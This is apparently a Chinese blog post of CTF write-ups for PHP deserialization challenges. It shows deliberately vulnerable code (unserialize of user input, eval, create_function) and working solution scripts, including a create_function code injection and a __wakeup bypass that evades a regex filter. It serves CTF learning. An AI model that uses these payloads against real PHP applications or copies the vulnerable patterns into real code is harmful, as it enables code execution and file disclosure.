-
php反序列化
level1
题目
class a{ var $act; function action(){ eval($this->act); } } $a=unserialize($_GET['flag']); $a->action(); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
WP
class a{ var $act="show_source('flag.php');"; function action(){ eval($this->act); } } $demo=new a(); $o=serialize($demo); # print_r($o); print_r(urlencode($o)); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
level2
题目
<?php include("flag.php"); class mylogin{ var $user; var $pass; function __construct($user,$pass){ $this->user=$user; $this->pass=$pass; } function login(){ if ($this->user=="daydream" and $this->pass=="ok"){ return 1; } } } $a=unserialize($_GET['param']); if($a->login()) { echo $flag; } ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
WP
class mylogin{ var $user; var $pass; function __construct($user,$pass){ $this->user=$user; $this->pass=$pass; } function login(){ if ($this->user=="daydream" and $this->pass=="ok"){ return 1; } } } $demo=new mylogin("daydream","ok"); $o=serialize($demo); print_r(urlencode($o)); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
level3
题目
<?php include("flag.php"); class mylogin{ var $user; var $pass; function __construct($user,$pass){ $this->user=$user; $this->pass=$pass; } function login(){ if ($this->user=="daydream" and $this->pass=="ok"){ return 1; } } } $a=unserialize($_COOKIE['param']); if($a->login()) { echo $flag; } ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
WP
wp同level3
level4
题目
class func { public $key; public function __destruct() { unserialize($this->key)(); } } class GetFlag { public $code; public $action; public function get_flag(){ $a=$this->action; $a('', $this->code); } } unserialize($_GET['param']); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
WP
unserialize($this->key)();
想到
unserialize([类,方法])();
这样就会执行该类下的方法$a('', $this->code);
想到
create_function(string $args, string $code)
这里是create_function() 代码注入class func { public $key; public function __construct(){ $this->key = serialize([new GetFlag(),"get_flag"]); } } class GetFlag { public $code; public $action; public function __construct(){ $this->code="}show_source('flag.php');//"; $this->action="create_function"; } } $demo=new func(); $o=serialize($demo); print_r(urlencode($o)); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
create_function注入效果为
function fT(){}show_source('flag.php');//}- 1
即
function fT(){} show_source('flag.php');//}- 1
- 2
level5
题目
class secret{ var $file='index.php'; public function __construct($file){ $this->file=$file; } function __destruct(){ include_once($this->file); echo $flag; } function __wakeup(){ $this->file='index.php'; } } $cmd=$_GET['cmd']; if (!isset($cmd)){ echo show_source('index.php',true); } else{ if (preg_match('/[oc]:\d+:/i',$cmd)){ echo "Are you daydreaming?"; } else{ unserialize($cmd); } } //sercet in flag.php ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
WP
class secret{ var $file; public function __construct($file){ $this->file=$file; } } $demo=new secret("flag.php"); $o=serialize($demo); print_r($o); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
反序列化时
__wakeup是在__destruct之前调用的
执行了__wakeup后文件就会变成index.php导致获取flag失败
因此要想办法跳过__wakeup直接执行__destruct__wakeup(),执行unserialize()时,先会调用这个函数。
当反序列化时的字符串所对应的对象的数目被修改,__wake 的函数就不会被调用. 并且不会重建为对象,
但是会触发其他的魔术方法比如__destructpreg_match('/[oc]:\d+:/i',$cmd)
会在O:6:"secret":1:{s:4:"file";s:8:"flag.php";}中匹配到O:6:
可以改为+6绕过 原理综上,
O:6:"secret":1:{s:4:"file";s:8:"flag.php";}
改为O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}level6
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); array_pop($xff); $ip = array_pop($xff); if($ip!=='127.0.0.1'){ die('error'); }else{ $token = $_POST['token']; if($token=='ctfshow'){ file_put_contents('flag.txt',$flag); } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
highlight_file(__FILE__); $vip = unserialize($_GET['vip']); //vip can get flag one key $vip->getFlag() ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
level7
level8
level9
level10
level11
level12
level13
level14
-
相关阅读:
大数据开发(Hadoop面试真题-卷二)
Eclipse的配置使用
QP状态机学习①——QP状态机架构
AI趋势量化系统(Binance升级版)
ES Query DSL-复合查询和关联查询
【历史上的今天】7 月 28 日:Lua 首次在线上运行;苹果停产所有非 iOS 的 iPod;戴尔工作站 400 推出
实现Promise所有核心功能和方法
PEG包裹碳化硅(SiC)量子点荧光材料
一文告知HTTP GET是否可以有请求体
Redis学习笔记-跳跃表
- 原文地址:https://blog.csdn.net/qq_40487134/article/details/127707509
